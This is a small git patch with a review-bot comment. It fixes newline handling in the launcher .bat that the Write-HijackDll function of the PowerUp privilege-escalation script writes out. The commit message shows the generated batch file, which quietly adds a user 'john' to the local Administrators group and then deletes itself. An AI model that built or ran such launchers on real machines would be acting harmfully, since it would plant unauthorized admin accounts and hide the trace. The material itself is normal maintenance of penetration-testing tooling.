From 9596f682744cf5c8bdcb67b6f2a18f5be94073e9 Mon Sep 17 00:00:00 2001
From: Jon Cave
Date: Thu, 30 Jun 2016 10:12:27 +0200
Subject: PowerUp: Remove badly encoded new lines from .bat output
The current implementation results in a .bat like: @echo off\n start /b net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add\n start /b "" cmd /c del "%~f0"&exit /b With literal "\n" strings at the end of the first two lines. A new line in a PowerShell string should be "`n". However, an extra new line isn't actually necessary in this case.
---
 Privesc/PowerUp.ps1 | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1
index 0b62245..2466975 100644
--- a/Privesc/PowerUp.ps1
+++ b/Privesc/PowerUp.ps1
@@ -2669,8 +2669,8 @@ function Write-HijackDll {
 # build the launcher .bat
 if (Test-Path $TargetBatPath) { Remove-Item -Force $TargetBatPath }
- "@echo off\n" | Out-File -Encoding ASCII -Append $TargetBatPath
- "start /b $BatCommand\n" | Out-File -Encoding ASCII -Append $TargetBatPath
+ "@echo off" | Out-File -Encoding ASCII -Append $TargetBatPath
+ "start /b $BatCommand" | Out-File -Encoding ASCII -Append $TargetBatPath
 'start /b "" cmd /c del "%~f0"&exit /b' | Out-File -Encoding ASCII -Append $TargetBatPath
 Write-Verbose ".bat launcher written to: $TargetBatPath"
-- cgit v1.2.3
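Review bot: The two rewritten `Out-File` lines now rely on `Out-File` ending each piped string with its own line break, and nothing beside them records that, so the `\n` mistake described in the commit message could easily be reintroduced. The existing `# build the launcher .bat` comment is the natural place for it; I would extend it with a second line such as `# Out-File terminates each string with a newline; do not append "\n" (PowerShell writes it as literal text)`. Write-HijackDll's body starts and ends outside this hunk, so whether the .bat content is documented elsewhere in the function cannot be seen from here.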